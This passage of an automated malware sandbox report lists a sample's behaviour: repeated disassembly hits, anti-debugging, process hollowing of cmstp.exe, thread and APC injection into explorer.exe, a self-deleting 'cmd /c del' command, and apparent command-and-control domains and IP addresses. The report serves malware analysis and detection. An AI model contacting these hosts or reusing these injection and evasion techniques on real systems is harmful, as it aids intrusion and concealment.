          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04623D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04663540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04693D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04607D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0466A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04614D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04698DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04666DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04611DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04618E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04628EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04600050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04600050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04667016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0467B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04663884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04663884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04604120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04612990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0462927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04674257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.jcernadas.com
          Source: C:\Windows\explorer.exeDomain query: www.theholisticbirthco.com
          Source: C:\Windows\explorer.exeDomain query: www.productsoffholland.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.88.202.115 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.tor-one.com
          Source: C:\Windows\explorer.exeDomain query: www.glgshopbd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.48.194 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeDomain query: www.autotrafficbot.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 188.93.150.75 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.15.160.167 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.216.152.43 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.82.188.40 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exeDomain query: www.de-knutselkeet.com
          Source: C:\Windows\explorer.exeDomain query: www.markmalls.com
          Source: C:\Windows\explorer.exeNetwork Connect: 80.67.16.8 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.240.239.44 80
          Source: C:\Windows\explorer.exeDomain query: www.jamessicilia.com
          Source: C:\Windows\explorer.exeDomain query: www.kinfet.com
          Source: C:\Windows\explorer.exeDomain query: www.physicalrobot.com
          Source: C:\Windows\explorer.exeDomain query: www.zhuledao.com
          Source: C:\Windows\explorer.exeDomain query: www.cgpizza.net
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.curiosityisthecurebook.com
          Source: C:\Windows\explorer.exeDomain query: www.usinggroovefunnels.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_73791000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection loaded: unknown target: C:\Users\user\Desktop\TazxfJHRhq.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 1190000
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: explorer.exe, 00000003.00000000.219509749.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000003.00000002.478136214.0000000001980000.00000002.00000001.sdmp, cmstp.exe, 00000004.00000002.477991867.00000000031B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
